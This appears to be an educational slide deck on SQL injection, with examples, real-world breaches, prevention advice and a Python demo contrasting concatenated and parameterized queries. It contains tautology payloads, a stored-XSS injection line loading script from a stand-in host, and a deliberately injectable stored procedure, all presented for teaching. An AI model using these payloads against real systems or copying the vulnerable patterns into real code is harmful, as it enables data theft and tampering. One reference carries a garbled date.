2. What is it?
A technique where individuals insert or append commands or code into a statement, thus altering the intent and actions of the resulting query
Allows hackers to view, delete, or change data in a compromising way
3. Basic Examples
Utilizing a statement that is always true
Entering a value into a field that will render a statement condition as always true (1=1 or ""="")
SELECT field_name from table_name where username = '' and 1=1 --'
Appending another command through a terminating character (such as ;)
4. Types of Vulnerabilities
Incorrect type handling
Database server
Blind injection
Conditional Responses
Conditional Errors
Time Delays
5. Combinations
SQL injection can be used in conjunction with XSS, malware, JavaScript, etc.
In 2008, over 1 million websites were compromised by hybridized SQL injection attacks utilizing other components
7. HTML Tags
SELECT FIRST_NAME, LAST_NAME FROM CUSTOMER WHERE USERNAME = '';
UPDATE CUSTOMER SET MIDDLE_NAME = '<script src=http://badsite.com>'; --'
8. Stored Procedures
CREATE PROCEDURE getOrdersByCustomerID @custId nvarchar(50) AS
-- Dynamic SQL built by string concatenation: @custId is pasted into the query text, so the procedure is injectable
EXECUTE('SELECT OrderID FROM Sales WHERE CustomerID = ''' + @custId + '''');
9. Difficulties
Obvious attacks
Structure deletion
Denial of Service
Increase load on the system
Covert attacks
Changes to data
Changes to code
10. Real World: Asprox
Executable installed via phishing emails or through the network
Searches Google for vulnerable ASP sites
Downloads compromising JavaScript from direct84.com
Attempts to download additional harmful JavaScript, Asprox copies, Trojan Danmec, and/or an SQL attack tool
11. Real World: Sony
Hacked by LulzSec
Attack on several of Sony's ventures, such as SonyPictures.com and music division servers
LulzSec claimed the attack resulted from a single statement
Injection may purportedly have been involved in the PSN attack as well
12. Real World: Sun & MySQL
TinKode and Ne0h compromised specific Sun domains
Obtained column names and email addresses in a table
MySQL.com
Exposed metadata, account names, and passwords (both admin and blog)
Issue with Web coding, not the database
13. Real World: CyberVors
Russian cyber criminal group
Compromised 400,000+ servers and sites
Approx. 1.2 billion usernames and passwords stolen
Indiscriminate targeting of companies
Utilized different hacking methods and several individuals and groups over several years
14. Preventative Measures
Blacklisted words or characters
Not recommended
Utilizing SQL parameters
Validation controls and field classification
Disallow error messages from revealing database metadata
Johnny's Google Hacking Database
Johnny.ihackstuff.com/ghdb
16. Validation Samples
// C# form of the slide's pseudocode: convert the input to the expected type before it reaches a query
try {
    int id = int.Parse(input); // a non-integer value throws instead of being passed on
}
catch (FormatException) {
    Response.Redirect("error.aspx"); // redirect to the error page rather than using the value
}
17. Validation Samples
// ADO.NET form of the slide's pseudocode: the user ID is bound as a parameter, never concatenated into the SQL text
string userId = Request["userid"];
var cmd = new SqlCommand("SELECT ID FROM TABLENAME WHERE USERID = @userId", connection);
cmd.Parameters.Add("@userId", SqlDbType.NVarChar, 50).Value = userId; // sent as data, not as SQL
var reader = cmd.ExecuteReader();
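Added example (not from the original slides): the always-true condition from slide 3 run against both the concatenated query form and the parameterized form of slide 17, plus the type check of slide 16, using Python's sqlite3 module on a constructed in-memory table. The table, column and user names are assumed.

```python
import sqlite3


def make_db():
    # Constructed sample data, not taken from the slides.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "s3cret"), (2, "bob", "hunter2")])
    return conn


def lookup_vulnerable(conn, username):
    # String concatenation: the input becomes part of the SQL text (the slide 3 pattern).
    sql = "SELECT id FROM users WHERE username = '" + username + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, username):
    # Bound parameter: the input is only ever compared as data (the slide 17 pattern).
    sql = "SELECT id FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]


def parse_user_id(raw):
    # Type validation (the slide 16 pattern): anything that is not an integer is rejected
    # and the caller redirects to an error page instead of querying with it.
    try:
        return int(raw)
    except ValueError:
        return None


if __name__ == "__main__":
    conn = make_db()
    tautology = "' or 1=1 --"  # makes the WHERE clause always true, comments out the closing quote
    print(lookup_vulnerable(conn, "alice"))       # [1]
    print(lookup_vulnerable(conn, tautology))     # [1, 2]: every row, the condition is always true
    print(lookup_parameterized(conn, tautology))  # []: no user has that literal name
    print(parse_user_id("42"), parse_user_id("1 or 1=1"))  # 42 None
```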
18. Follow-up Questions
What tools or techniques can be used to determine vulnerabilities within a system for SQLi?
Have you had to reassess code to prevent SQLi vulnerabilities? If so, please elaborate.
What are some other modern cases involving SQLi?
19. References & Readings
Arthur, C. (2014). LulzSec hacker arrested over Sony attack. Retrieved from http://www.theguardian.com/technology/2012/aug/29/lulzsec-hacker-arrest-sony-attack
Databases vulnerable to SQL injections. (2008). Data Strategy, 3(12), 6.
Dorai, R., & Kannan, V. (2011). SQL Injection - Database Attack Revolution and Prevention. Journal of International Commercial Law & Technology, 6(4), 224-231.
International Business Times. (0006, July). Post-PSN hack: Sony apologise at E3 as LulzSec mount fresh attack. International Business Times.
Kirk, J. (2013). Asprox botnet proves to be a resilient foe. CIO (13284045), 8.
Lemos, R. (2014). Russian cyber-gang gathers 1.2B login credentials via website flaws. eWeek, 7.
OWASP. (2014). SQL Injection. Retrieved from https://www.owasp.org/index.php/SQL_Injection
Prince, B. (2008). Botnet installs SQL injection tool. eWeek, 25(16), 21.
Sullivan, B., & Liu, V. (2012). Web Application Security: A Beginner's Guide. New York, NY: McGraw-Hill Companies.
Sun.com, MySQL.com hacked, SQL injection attack. (2011). Channel Insider, 1.
W3Schools. (2014). SQL injection. Retrieved from http://www.w3schools.com/sql/sql_injection.asp